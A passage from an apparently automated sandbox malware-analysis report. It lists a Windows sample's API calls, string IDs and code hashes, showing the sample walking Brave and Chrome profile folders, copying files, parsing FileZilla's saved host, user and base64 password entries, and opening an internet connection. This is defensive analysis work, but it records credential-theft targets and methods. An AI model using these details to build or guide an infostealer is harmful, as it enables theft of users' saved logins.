                              • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0039E776
                              • DeleteFileA.KERNEL32(?), ref: 0039E7D2
                              • StrCmpCA.SHLWAPI(?,00F28998), ref: 0039E7FC
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E88C
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E8B5
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E8EE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E916
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E952
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 2635522530-726946144
                              • Opcode ID: be1916b1bc629050a6bdcab0b119c1a20dd2f8ebde12ef6143830a13b87f3ece
                              • Instruction ID: 43d79c37a9653b4f5796dc08d26186ed0c8f16b9f7dbd8dd2d8260346c405859
                              • Opcode Fuzzy Hash: be1916b1bc629050a6bdcab0b119c1a20dd2f8ebde12ef6143830a13b87f3ece
                              • Instruction Fuzzy Hash: 47925F7191161AAFCF22EFA4DC8AEAF77B9AF54300F054528F846AB251DB34DC45CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A18D2
                              • lstrlen.KERNEL32(\*.*), ref: 003A18DD
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A18FF
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 003A190B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1932
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A1947
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A1967
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A1981
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A19BF
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A19F2
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A1A1A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A1A25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1A4C
                              • lstrlen.KERNEL32(003C1794), ref: 003A1A5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1A80
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1A8C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1AB4
                              • lstrlen.KERNEL32(?), ref: 003A1AC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1AE5
                              • lstrcat.KERNEL32(00000000,?), ref: 003A1AF3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B19
                              • lstrlen.KERNEL32(00F28968), ref: 003A1B2F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B59
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A1B64
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B8F
                              • lstrlen.KERNEL32(003C1794), ref: 003A1BA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1BC3
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1BCF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1BF8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C25
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A1C30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C57
                              • lstrlen.KERNEL32(003C1794), ref: 003A1C69
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C8B
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1C97
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1CC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1CEF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A1CFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D21
                              • lstrlen.KERNEL32(003C1794), ref: 003A1D33
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D55
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1D61
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1DB9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A1DC4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1DED
                              • lstrlen.KERNEL32(003C1794), ref: 003A1E19
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1E36
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1E42
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1E68
                              • lstrlen.KERNEL32(00F2DA20), ref: 003A1E7E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1EB2
                              • lstrlen.KERNEL32(003C1794), ref: 003A1EC6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1EE3
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1EEF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F15
                              • lstrlen.KERNEL32(00F2E3F8), ref: 003A1F2B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F5F
                              • lstrlen.KERNEL32(003C1794), ref: 003A1F73
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F90
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1F9C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1FC2
                              • lstrlen.KERNEL32(00F1A900), ref: 003A1FD8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2000
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A200B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2036
                              • lstrlen.KERNEL32(003C1794), ref: 003A2048
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2067
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A2073
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2098
                              • lstrlen.KERNEL32(?), ref: 003A20AC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A20D0
                              • lstrcat.KERNEL32(00000000,?), ref: 003A20DE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2103
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A213F
                              • lstrlen.KERNEL32(00F2DB70), ref: 003A214E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2176
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A2181
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                              • String ID: \*.*
                              • API String ID: 712834838-1173974218
                              • Opcode ID: 2d3dae082ef6da405c10618a8e07db7546130bd19051b67074e5b1b17bc45e2b
                              • Instruction ID: afe61adb01873c9f32c7238108e3b51f9d9a09accf43fb207d7be4c6c0ef178a
                              • Opcode Fuzzy Hash: 2d3dae082ef6da405c10618a8e07db7546130bd19051b67074e5b1b17bc45e2b
                              • Instruction Fuzzy Hash: FC623D31912A16AFCB23AB64CC49EBF77B9EF55700F0A0128F805AB251DB34DD15DBA0
                              APIs
                              • wsprintfA.USER32 ref: 003A392C
                              • FindFirstFileA.KERNEL32(?,?), ref: 003A3943
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A396C
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A3986
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A39BF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A39E7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A39F2
                              • lstrlen.KERNEL32(003C1794), ref: 003A39FD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3A1A
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3A26
                              • lstrlen.KERNEL32(?), ref: 003A3A33
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3A53
                              • lstrcat.KERNEL32(00000000,?), ref: 003A3A61
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3A8A
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A3ACE
                              • lstrlen.KERNEL32(?), ref: 003A3AD8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B05
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A3B10
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B36
                              • lstrlen.KERNEL32(003C1794), ref: 003A3B48
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B6A
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3B76
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B9E
                              • lstrlen.KERNEL32(?), ref: 003A3BB2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3BD2
                              • lstrcat.KERNEL32(00000000,?), ref: 003A3BE0
                              • lstrlen.KERNEL32(00F28A28), ref: 003A3C0B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3C31
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A3C3C
                              • lstrlen.KERNEL32(00F28968), ref: 003A3C5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3C84
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A3C8F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3CB7
                              • lstrlen.KERNEL32(003C1794), ref: 003A3CC9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3CE8
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3CF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3D1A
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A3D47
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A3D52
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3D79
                              • lstrlen.KERNEL32(003C1794), ref: 003A3D8B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3DAD
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3DB9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3DE2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3E11
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A3E1C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3E43
                              • lstrlen.KERNEL32(003C1794), ref: 003A3E55
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3E77
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3E83
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3EAC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3EDB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A3EE6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3F0D
                              • lstrlen.KERNEL32(003C1794), ref: 003A3F1F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3F41
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3F4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3F75
                              • lstrlen.KERNEL32(?), ref: 003A3F89
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3FA9
                              • lstrcat.KERNEL32(00000000,?), ref: 003A3FB7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3FE0
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A401F
                              • lstrlen.KERNEL32(00F2DB70), ref: 003A402E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4056
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A4061
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A408A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A40CE
                              • lstrcat.KERNEL32(00000000), ref: 003A40DB
                              • FindNextFileA.KERNEL32(00000000,?), ref: 003A42D9
                              • FindClose.KERNEL32(00000000), ref: 003A42E8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 1006159827-1013718255
                              • Opcode ID: 8ebf318f1947860f18923d7d9e327dd7357b31d1e23447bedc9ae69406ac4081
                              • Instruction ID: d9c048a3457816e496ec8600b8cedb29f66afea4af54fc1e705f5cf9013e0a08
                              • Opcode Fuzzy Hash: 8ebf318f1947860f18923d7d9e327dd7357b31d1e23447bedc9ae69406ac4081
                              • Instruction Fuzzy Hash: 8E625C31912A16AFCB23AF64DC49EAFB7B9EF55700F054128F806A7251DB74EE05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6995
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003A69C8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A29
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A6A34
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A5D
                              • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 003A6A77
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A99
                              • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 003A6AA5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6AD0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6B00
                              • LocalAlloc.KERNEL32(00000040,?), ref: 003A6B35
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6B9D
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6BCD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 313953988-555421843
                              • Opcode ID: c05ea4ba83034cd6848a6f536a1aafbe7d50d9a1d1fdcb0cfc2418b87739fef6
                              • Instruction ID: 38a6cc857a34e7dcf9f9e57652759ac65ffc05cd2451336e2e2cc8d4e8cfea75
                              • Opcode Fuzzy Hash: c05ea4ba83034cd6848a6f536a1aafbe7d50d9a1d1fdcb0cfc2418b87739fef6
                              • Instruction Fuzzy Hash: E6427F71A11A06AFCB22ABB4DC8EEAF77B9EF15700F095458F901EB251DB34D905CB60
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DBC1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DBE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DBEF
                              • lstrlen.KERNEL32(003C4CA8), ref: 0039DBFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC17
                              • lstrcat.KERNEL32(00000000,003C4CA8), ref: 0039DC23
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC4C
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DC8F
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DCBF
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 0039DCD0
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 0039DCF0
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 0039DD0A
                              • lstrlen.KERNEL32(003BCFEC), ref: 0039DD1D
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DD47
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DD70
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DD7B
                              • lstrlen.KERNEL32(003C1794), ref: 0039DD86
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDA3
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DDAF
                              • lstrlen.KERNEL32(?), ref: 0039DDBC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDDF
                              • lstrcat.KERNEL32(00000000,?), ref: 0039DDED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DE19
                              • lstrlen.KERNEL32(003C1794), ref: 0039DE3D
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039DE6F
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DE7B
                              • lstrlen.KERNEL32(00F28BB8), ref: 0039DE8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DEB0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DEBB
                              • lstrlen.KERNEL32(003C1794), ref: 0039DEC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039DEE6
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DEF2
                              • lstrlen.KERNEL32(00F28A78), ref: 0039DF01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF27
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DF32
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFA5
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DFB1
                              • lstrlen.KERNEL32(00F28BB8), ref: 0039DFC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFE9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DFF4
                              • lstrlen.KERNEL32(003C1794), ref: 0039DFFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E022
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039E02E
                              • lstrlen.KERNEL32(00F28A78), ref: 0039E03D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E063
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039E06E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E09A
                              • StrCmpCA.SHLWAPI(?,Brave), ref: 0039E0CD
                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 0039E0E7
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E11F
                              • lstrlen.KERNEL32(00F2DB70), ref: 0039E12E
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E155
                              • lstrcat.KERNEL32(00000000,?), ref: 0039E15D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E19F
                              • lstrcat.KERNEL32(00000000), ref: 0039E1A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E1D0
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0039E1F9
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E22F
                              • lstrlen.KERNEL32(00F28A28), ref: 0039E23D
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E261
                              • lstrcat.KERNEL32(00000000,00F28A28), ref: 0039E269
                              • FindNextFileA.KERNEL32(00000000,?), ref: 0039E988
                              • FindClose.KERNEL32(00000000), ref: 0039E997
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                              • String ID: Brave$Preferences$\Brave\Preferences
                              • API String ID: 1346089424-1230934161
                              • Opcode ID: bbca5f2e1d75fa86fb5834c92556d644a564cdca01c290d8dece5cd9f48bbcca
                              • Instruction ID: d36998c00765df16d6eafdc9ee79acef25e248dccc36731a99e15ca7831f53af
                              • Opcode Fuzzy Hash: bbca5f2e1d75fa86fb5834c92556d644a564cdca01c290d8dece5cd9f48bbcca
                              • Instruction Fuzzy Hash: 2F526D71911A06AFCF22EF65DC8AEAF77B9AF54700F054528F846AB251DB34DC05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 003960FF
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396152
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396185
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003961B5
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003961F0
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396223
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00396233
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: e66bf118650be3c4aee82ea49e143092ce3e7fdd694048f2754f99e47dc62e60
                              • Instruction ID: acc55249727f5cffb1a2734c0fa7bda0b86c260b6546eb7ca9141bb6e19d1b68
                              • Opcode Fuzzy Hash: e66bf118650be3c4aee82ea49e143092ce3e7fdd694048f2754f99e47dc62e60
                              • Instruction Fuzzy Hash: A6522B72912A16AFDF22EBA4DC4AEAF77B9AF54300F154424F905EB251DB34EC05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6B9D
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6BCD
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6BFD
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6C2F
                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 003A6C3C
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003A6C43
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 003A6C5A
                              • lstrlen.KERNEL32(00000000), ref: 003A6C65
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6CA8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6CCF
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 003A6CE2
                              • lstrlen.KERNEL32(00000000), ref: 003A6CED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6D30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6D57
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 003A6D6A
                              • lstrlen.KERNEL32(00000000), ref: 003A6D75
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6DB8
